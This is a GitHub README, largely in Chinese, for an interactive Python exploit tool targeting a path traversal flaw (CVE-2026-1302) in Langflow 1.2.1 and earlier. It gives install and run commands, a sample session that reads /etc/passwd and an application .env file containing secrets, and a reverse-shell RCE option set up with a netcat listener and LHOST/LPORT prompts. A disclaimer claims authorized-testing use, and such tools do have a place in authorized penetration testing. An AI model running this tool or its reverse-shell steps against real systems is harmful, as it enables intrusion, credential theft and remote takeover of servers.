ekomsSavior/Lang_path

GitHub: ekomsSavior/Lang_path

针对 Langflow 可视化 AI 平台路径遍历漏洞(CVE-2026-1302)的交互式利用工具,支持任意文件读取与 RCE 尝试。

Stars: 0 | Forks: 0

# Lang_path Langflow 路径遍历漏洞利用工具 (CVE-2026-1302) 一个完全交互式的 Python 脚本,用于利用 Langflow 版本 ≤ 1.2.1 中的路径遍历漏洞,详见 [GHSA‑vwmf‑pq79‑vjvx](https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx)。 该工具允许攻击者从服务器读取任意文件,并在某些配置下实现远程代码执行。 ## 免责声明 本工具仅供授权安全测试和教育目的使用。 未经授权访问计算机系统是非法的。作者不对因使用本软件而导致的任何误用或损害承担责任。 请仅针对您拥有或明确获得测试许可的系统使用本工具。 ## 安装 1. **克隆仓库** git clone https://github.com/ekomsSavior/Lang_path.git cd Lang_path ``` 1. Install the required Python package ```bash pip3 install requests ``` 2. 使脚本可执行(可选) chmod +x langflow_exploit.py 用法 运行脚本并按照交互式提示操作: ``` python3 langflow_exploit.py ``` 系统将要求您提供: · Target URL(目标 URL):Langflow 实例的基础 URL(例如,http://192.168.1.100:7860)。 · Continue prompts(继续提示):如果版本检测失败或初始测试结果不确定,您可以选择继续执行。 · File paths(文件路径):在交互模式下,您可以指定任何要读取的文件路径(例如,/etc/passwd, /app/langflow/.env)。 · LHOST/LPORT:如果您选择尝试远程代码执行,请提供您的 IP 和用于 reverse shell 的监听端口。 示例会话 ``` $ python3 langflow_exploit.py ╔═══════════════════════════════════════════════════════╗ ║ Langflow Path Traversal Exploit ║ ║ CVE-2026-1302 - File Read & RCE ║ ║ Affects Langflow <= 1.2.1 ║ ╚═══════════════════════════════════════════════════════╝ [*] Please provide the target Langflow instance: Target URL (e.g., http://192.168.1.100:7860): http://10.10.10.50:7860 [*] Target set to: http://10.10.10.50:7860 [+] Target is reachable [*] Detected Langflow version: 1.2.0 [+] Version appears vulnerable! [*] Testing for path traversal vulnerability... [+] VULNERABLE! Successfully read /etc/passwd [*] Target is vulnerable! Entering interactive mode. ================================================== Available actions: 1. Read another file 2. Attempt RCE (reverse shell) 3. Exit Select action (1/2/3): 1 Enter file path to read (e.g., /etc/passwd): /app/langflow/.env [+] Contents of /app/langflow/.env: ================================================== SECRET_KEY=supersecretkey123 DATABASE_URL=postgresql://user:pass@localhost/langflow ... ================================================== ``` 远程代码执行 (RCE) 尝试 该脚本包含一个模块,尝试上传恶意组件以获取 reverse shell。 在选择选项 2 之前,请在单独的终端中启动一个 netcat 监听器: ``` nc -lvnp 4444 ``` 然后按照提示提供您的 IP (LHOST) 和相同的端口 (LPORT)。 如果成功,您将在监听器终端中看到一个连接。 注意:RCE 成功与否取决于目标配置。文件读取功能是主要可靠的利用方式。 参考资料 · Langflow 安全公告 GHSA‑vwmf‑pq79‑vjvx · CVE-2026-1302 详情 · Langflow GitHub 仓库
标签:CISA项目, CVE-2026-1302, HTTP工具, Langflow, Langflow安全, Maven, PoC, Python, RCE, 任意文件读取, 安全测试, 攻击性安全, 无后门, 暴力破解, 漏洞验证, 编程工具, 网络安全, 网络安全审计, 路径遍历, 远程代码执行, 逆向Shell, 逆向工具, 隐私保护